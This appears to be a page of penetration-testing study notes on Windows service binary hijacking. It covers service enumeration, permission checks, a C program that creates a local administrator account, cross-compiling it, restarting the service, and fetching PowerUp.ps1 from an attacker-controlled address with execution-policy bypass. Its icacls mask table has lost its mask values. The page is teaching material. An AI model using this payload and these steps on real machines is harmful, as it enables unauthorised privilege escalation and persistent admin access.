Service Binary Hijacking

Introduction

Each Windows service has an associated binary file. These binary files are executed when the service is started or transitioned into a running state. If the permissions of this program are insecure, a lower-privileged user can replace the program with a malicious one. To execute the replaced binary, the user can restart the service or reboot the machine if the service is configured to be executed on startup.

Listing Installed Windows Services

GUI

If we have access to the GUI we can run the services.msc

Powershell

Get-CimInstance

Get-Service

PS C:\Users\dave> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Name                      State   PathName
----                      -----   --------
Apache2.4                 Running "C:\xampp\apache\bin\httpd.exe" -k runservice
Appinfo                   Running C:\Windows\system32\svchost.exe -k netsvcs -p
AppXSvc                   Running C:\Windows\system32\svchost.exe -k wsappx -p
AudioEndpointBuilder      Running C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p
Audiosrv                  Running C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
BFE                       Running C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
BITS                      Running C:\Windows\System32\svchost.exe -k netsvcs -p
BrokerInfrastructure      Running C:\Windows\system32\svchost.exe -k DcomLaunch -p
...
mysql                     Running C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql
...

Enumerate Services Privileges

We can use the traditional icacls Windows utility or the PowerShell Cmdlet Get-ACL

icacls

The icacls utility outputs the corresponding principals and their permission mask. The most relevant permissions and their masks are listed here:

Mask

Permissions

Full access

Modify access

Read and execute access

Read-only access

Write-only access

Replacing Binary with Malicious Binary

Binary to Create Local Administrator User

#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  
  return 0;
}

If you are on a *nix machine, you can cross compile using mingw-64.

kali@kali:~$ x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Executing the Malicious Binary

In order to execute the binary through the service, we need to restart it.

net stop <service>
net start <service>

If you do not have sufficient permissions to stop the service, we can check the service Startup Type. If the startup type is Automatic, we may be able to restart the service by rebooting the machine.

Checking Service Startup Type

PS C:\Users\dave> Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}

Name  StartMode
----  ---------
mysql Auto

In order to reboot, our user also needs to have the SeShutDownPrivilege assigned. We can use whoami /priv to determine those rights.

PS C:\Users\dave> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeSecurityPrivilege           Manage auditing and security log     Disabled
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

(The Disabled state only indicates if the privilege is currently enabled for the running process, but it does show we have the privilege)

Automated Privilege Escalation Detection using PowerUp.ps1

PS C:\Users\dave> iwr -uri http://192.168.48.3/PowerUp.ps1 -Outfile PowerUp.ps1

PS C:\Users\dave> powershell -ep bypass
...
PS C:\Users\dave>  . .\PowerUp.ps1

PS C:\Users\dave> Get-ModifiableServiceFile

...

ServiceName                     : mysql
Path                            : C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql
ModifiableFile                  : C:\xampp\mysql\bin\mysqld.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'mysql'
CanRestart                      : False

PreviousAutomated Enumeration Tools NextDLL Hijacking

Last updated 1 year ago